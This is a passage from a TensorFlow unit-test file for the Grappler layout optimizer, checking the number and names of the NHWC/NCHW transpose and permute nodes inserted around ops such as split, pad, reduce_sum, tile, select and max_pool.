meta_graph = saver_lib.export_meta_graph(graph_def=graph.as_graph_def())
return meta_graph
def _get_cluster():
named_device = device_properties_pb2.NamedDevice()
named_device.name = '/GPU:0'
named_device.properties.type = 'GPU'
named_device.properties.num_cores = 24
named_device.properties.frequency = 1000
named_device.properties.environment['architecture'] = '4'
cluster = gcluster.Cluster(devices=[named_device])
return cluster
def _is_transpose(node):
return node.endswith('TransposeNHWCToNCHW-LayoutOptimizer') or node.endswith(
'TransposeNCHWToNHWC-LayoutOptimizer')
def _is_permute(node):
return node.endswith('VecPermuteNHWCToNCHW-LayoutOptimizer') or node.endswith(
'VecPermuteNCHWToNHWC-LayoutOptimizer')
class LayoutOptimizerTest(test.TestCase):
"""Tests the Grappler layout optimizer."""
def _assert_trans_nchw_to_nhwc(self, name, nodes):
self.assertIn(name + '-TransposeNCHWToNHWC-LayoutOptimizer', nodes)
def _assert_trans_nhwc_to_nchw(self, name, nodes):
self.assertIn(name + '-TransposeNHWCToNCHW-LayoutOptimizer', nodes)
def _assert_map_nhwc_to_nchw(self, name, nodes):
self.assertIn(name + '-DimMapNHWCToNCHW-LayoutOptimizer', nodes)
def _assert_vec_nchw_to_nhwc(self, name, nodes):
self.assertIn(name + '-VecPermuteNCHWToNHWC-LayoutOptimizer', nodes)
def _assert_vec_nhwc_to_nchw(self, name, nodes):
self.assertIn(name + '-VecPermuteNHWCToNCHW-LayoutOptimizer', nodes)
def _train(self, checkpoint_path, layout_optimizer=False, restore=False):
ops.reset_default_graph()
graph = ops.get_default_graph()
with session.Session(
config=_get_config(layout_optimizer), graph=graph) as sess:
batch = 2
height = 6
width = 7
input_channels = 3
shape = [batch, height, width, input_channels]
image = array_ops.placeholder(dtype='float32', shape=shape)
conv1 = conv_layers.conv2d(image, 32, [3, 3])
conv2 = conv_layers.conv2d(conv1, 32, [3, 3])
optimizer = gradient_descent.GradientDescentOptimizer(0.01)
loss = math_ops.reduce_mean(conv2)
train_op = optimizer.minimize(loss)
saver = saver_lib.Saver(write_version=saver_pb2.SaverDef.V2)
if restore:
saver.restore(sess, checkpoint_path)
else:
self.evaluate(variables.global_variables_initializer())
np.random.seed(0)
for _ in range(2):
image_val = np.random.rand(*shape).astype(np.float32)
sess.run([loss, train_op], feed_dict={image: image_val})
if restore:
all_vars = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
all_vars_values = [var.eval(session=sess) for var in all_vars]
return all_vars_values
else:
saver.save(sess, checkpoint_path)
def testTwoConvLayers(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
output = _two_layer_model(x)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('Relu_1-0-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testSplitWithNonConstAxis(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
dim = array_ops.placeholder(dtype='int32')
split = array_ops.split(conv, 2, axis=dim)
scale = constant_op.constant(0.1, shape=[32])
offset = constant_op.constant(0.3, shape=[32])
bn0 = nn.fused_batch_norm(split[0], scale, offset)
bn1 = nn.fused_batch_norm(split[1], scale, offset)
add = bn0[0] + bn1[0]
output = array_ops.identity(add)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = sess.run(output, feed_dict={dim: 3})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata, feed_dict={dim: 3})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('add_2-0-0', nodes)
self._assert_map_nhwc_to_nchw('split-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testSplitVWithNonConstAxis(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
dim = array_ops.placeholder(dtype='int32')
sizes = constant_op.constant([50, 10, 4], shape=[3])
split = gen_array_ops.split_v(
value=conv, size_splits=sizes, axis=dim, num_split=3)
output = math_ops.reduce_sum(split[0])
with session.Session(config=_get_config(False)) as sess:
output_val_ref = sess.run(output, feed_dict={dim: 3})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata, feed_dict={dim: 3})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('SplitV-0-0', nodes)
self._assert_map_nhwc_to_nchw('SplitV-2', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testPadWithConstPaddings(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
paddings_val = [[1, 2], [3, 4], [5, 6], [7, 8]]
paddings = constant_op.constant(
paddings_val, dtype='int32', name='PaddingsConst')
pad = array_ops.pad(conv, paddings)
output = array_ops.identity(pad)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('Pad-0-0', nodes)
self.assertIn('Pad-1-LayoutOptimizer', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testReduceSum(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
reduce_sum = math_ops.reduce_sum(conv)
output = array_ops.identity(reduce_sum)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Three transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 1
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testCast(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
cast = math_ops.cast(conv, dtype='bool')
output = array_ops.identity(cast)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('Cast-0-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testSqueeze(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
reduce_sum = math_ops.reduce_sum(conv, axis=[1, 2])
squeeze = array_ops.squeeze(reduce_sum)
output = array_ops.identity(squeeze)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Three transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 1
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testSqueezeAlongHW(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
reduce_sum = math_ops.reduce_sum(conv, axis=[1, 2], keepdims=True)
squeeze = array_ops.squeeze(reduce_sum, axis=[1, 2])
output = array_ops.identity(squeeze)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Three transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 1
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testSqueezeAlongNHW(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
reduce_sum = math_ops.reduce_sum(conv, axis=[0, 1, 2], keepdims=True)
squeeze = array_ops.squeeze(reduce_sum, axis=[0, 1, 2])
output = array_ops.identity(squeeze)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Three transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 1
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testReduceSumAlongHWC(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
reduce_sum = math_ops.reduce_sum(conv, axis=[1, 2, 3])
output = array_ops.identity(reduce_sum)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Three transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 1
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testReduceSumAlongNHW(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
reduce_sum = math_ops.reduce_sum(conv, axis=[0, 1, 2])
output = array_ops.identity(reduce_sum)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Three transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 1
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testReduceSumAlongC(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
reduce_sum = math_ops.reduce_sum(conv, axis=[3])
output = array_ops.identity(reduce_sum)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Three transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 1
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testReduceSumAlongCKeepDims(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
reduce_sum = math_ops.reduce_sum(conv, axis=[3], keepdims=True)
output = array_ops.identity(reduce_sum)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('Sum-0-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testReduceSumAlongHKeepDims(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
reduce_sum = math_ops.reduce_sum(conv, axis=[2], keepdims=True)
output = array_ops.identity(reduce_sum)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testReduceSumAlongWCKeepDims(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
reduce_sum = math_ops.reduce_sum(conv, axis=[2, 3], keepdims=True)
output = array_ops.identity(reduce_sum)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testConcatWithControlDependency(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
axis = constant_op.constant(3)
var = variables.Variable(3)
assign = state_ops.assign(var, 6)
with ops.control_dependencies([assign]):
concat = array_ops.concat([conv, conv], axis)
output = array_ops.identity(concat)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('concat-0-0', nodes)
self.assertIn('concat-2-LayoutOptimizer', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testFill(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = array_ops.placeholder(dtype='float32')
conv = _two_layer_model(x)
shape = array_ops.shape(conv)
      scalar = constant_op.constant(5.7)
fill = array_ops.fill(shape, scalar)
output = array_ops.identity(fill)
x_val = [3.4] * 784
with session.Session(config=_get_config(False)) as sess:
output_val_ref = sess.run(output, feed_dict={x: x_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
x: x_val
})
nodes = []
num_transposes = 0
num_vec_permute = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
if _is_permute(node.name):
num_vec_permute += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
# Two vector permute nodes were initially added in the Expand phase of
# LayoutOptimizer; they cancelled out each other in the Collapse phase.
expected_vec_permute = 0
self.assertEqual(expected_vec_permute, num_vec_permute)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('Fill-0-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testTile(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
multiple = array_ops.placeholder(dtype='int32')
tile = array_ops.tile(conv, multiple)
output = array_ops.identity(tile)
multiple_val = [2, 3, 4, 1]
with session.Session(config=_get_config(False)) as sess:
output_val_ref = sess.run(output, feed_dict={multiple: multiple_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
multiple: multiple_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('Tile-0-0', nodes)
self._assert_vec_nhwc_to_nchw('Tile-1', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testReverseWithConstDims(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
dims = constant_op.constant([3, 1], name='DimsConst')
reverse = array_ops.reverse(conv, dims)
output = array_ops.identity(reverse)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('ReverseV2-0-0', nodes)
self.assertIn('ReverseV2-1-LayoutOptimizer', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testReverseWithNonConstDims(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
dims = array_ops.placeholder(dtype='int32')
reverse = array_ops.reverse(conv, dims)
output = array_ops.identity(reverse)
dims_val = [2, 3]
with session.Session(config=_get_config(False)) as sess:
output_val_ref = sess.run(output, feed_dict={dims: dims_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
dims: dims_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('ReverseV2-0-0', nodes)
self._assert_map_nhwc_to_nchw('ReverseV2-1', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testSelectOp(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
add = math_ops.add(conv, conv)
mean = math_ops.reduce_mean(conv)
condition = math_ops.less(conv, mean)
select = gen_math_ops.select(condition, conv, add)
output = array_ops.identity(select)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('Select-0-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testSelectOpConditionUnknownShape(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
add = math_ops.add(conv, conv)
condition = array_ops.placeholder(dtype='bool')
select = gen_math_ops.select(condition, conv, add)
output = array_ops.identity(select)
condition_val = np.zeros((1, 7, 7, 64))
with session.Session(config=_get_config(False)) as sess:
output_val_ref = sess.run(output, feed_dict={condition: condition_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={condition: condition_val})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 3
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testSelectOpScalarCondition(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
add = math_ops.add(conv, conv)
condition = constant_op.constant(True)
select = gen_math_ops.select(condition, conv, add)
output = array_ops.identity(select)
with session.Session(config=_get_config(False)) as sess:
output_val_ref = self.evaluate(output)
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(output, run_metadata=metadata)
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('Select-0-0', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testPadWithNonConstPaddings(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
paddings = array_ops.placeholder(dtype='int32')
pad = array_ops.pad(conv, paddings)
output = array_ops.identity(pad)
paddings_val = [[1, 2], [3, 4], [5, 6], [7, 8]]
with session.Session(config=_get_config(False)) as sess:
output_val_ref = sess.run(output, feed_dict={paddings: paddings_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
paddings: paddings_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('Pad-0-0', nodes)
self._assert_vec_nhwc_to_nchw('Pad-1', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testMaxPoolV2(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
ksize = constant_op.constant([1, 2, 3, 1], shape=[4])
strides = array_ops.placeholder(dtype='int32', shape=[4])
max_pool = gen_nn_ops.max_pool_v2(conv, ksize, strides, 'VALID')
output = array_ops.identity(max_pool)
strides_val = [1, 3, 2, 1]
with session.Session(config=_get_config(False)) as sess:
output_val_ref = sess.run(output, feed_dict={strides: strides_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
strides: strides_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('MaxPoolV2-0-0', nodes)
self._assert_vec_nhwc_to_nchw('MaxPoolV2-2', nodes)
self.assertIn('MaxPoolV2-1-LayoutOptimizer', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testMaxPoolGradV2(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
ksize = constant_op.constant([1, 2, 3, 1], shape=[4])
strides = array_ops.placeholder(dtype='int32', shape=[4])
max_pool_grad = gen_nn_ops.max_pool_grad_v2(conv, conv, conv, ksize,
strides, 'VALID')
output = array_ops.identity(max_pool_grad)
strides_val = [1, 3, 2, 1]
with session.Session(config=_get_config(False)) as sess:
output_val_ref = sess.run(output, feed_dict={strides: strides_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
strides: strides_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
self._assert_trans_nhwc_to_nchw('Conv2D-0', nodes)
self._assert_trans_nchw_to_nhwc('MaxPoolGradV2-0-0', nodes)
self._assert_vec_nhwc_to_nchw('MaxPoolGradV2-4', nodes)
self.assertIn('MaxPoolGradV2-3-LayoutOptimizer', nodes)
self.assertAllClose(output_val_ref, output_val, atol=1e-3)
def testSliceWithNonConstAxis(self):
if test.is_gpu_available(cuda_only=True):
random_seed.set_random_seed(0)
x = random_ops.truncated_normal([1, 784], seed=0)
conv = _two_layer_model(x)
size = array_ops.placeholder(dtype='int32')
s = array_ops.slice(conv, [0, 0, 0, 0], size)
output = array_ops.identity(s)
size_val = [1, 2, 3, 4]
with session.Session(config=_get_config(False)) as sess:
output_val_ref = sess.run(output, feed_dict={size: size_val})
with session.Session(config=_get_config()) as sess:
metadata = config_pb2.RunMetadata()
output_val = sess.run(
output, run_metadata=metadata, feed_dict={
size: size_val
})
nodes = []
num_transposes = 0
for node in metadata.cost_graph.node:
if _is_transpose(node.name):
num_transposes += 1
nodes.append(node.name)
# Four transposes were initially added in the Expand phase of
# LayoutOptimizer; two of them are cancelled out in the Collapse phase.
expected_num_transposes = 2
self.assertEqual(expected_num_transposes, num_transposes)
